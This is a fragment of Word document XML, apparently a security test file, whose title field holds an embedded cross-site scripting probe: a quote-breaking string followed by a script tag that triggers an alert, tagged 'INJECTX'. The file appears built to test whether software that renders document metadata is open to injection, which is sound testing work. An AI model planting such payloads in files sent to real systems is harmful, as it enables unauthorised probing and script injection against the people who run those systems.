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EFF" w:rsidRDefault="00BE0956" w:rsidP="00BE0956">
      <w:pPr>
        <w:pStyle w:val="Title"/>
      </w:pPr>
      <w:r>
        <w:t>“&gt;&lt;script&gt;</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>alert(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>200)&lt;/s</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:t>cript&gt;//INJECTX</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="001A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56"/>
    <w:rsid w:val="00270337"/>
    <w:rsid w:val="00B47207"/>
    <w:rsid w:val="00BE0956"/>
    <w:rsid w:val="00EA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E34B5-D00B-437D-A6D3-4202C40C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nonxero</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>nonxero</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2015-09-30T14:52:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2015-09-30T14:53:00Z</dcterms:modified>
</cp:coreProperties>
</file>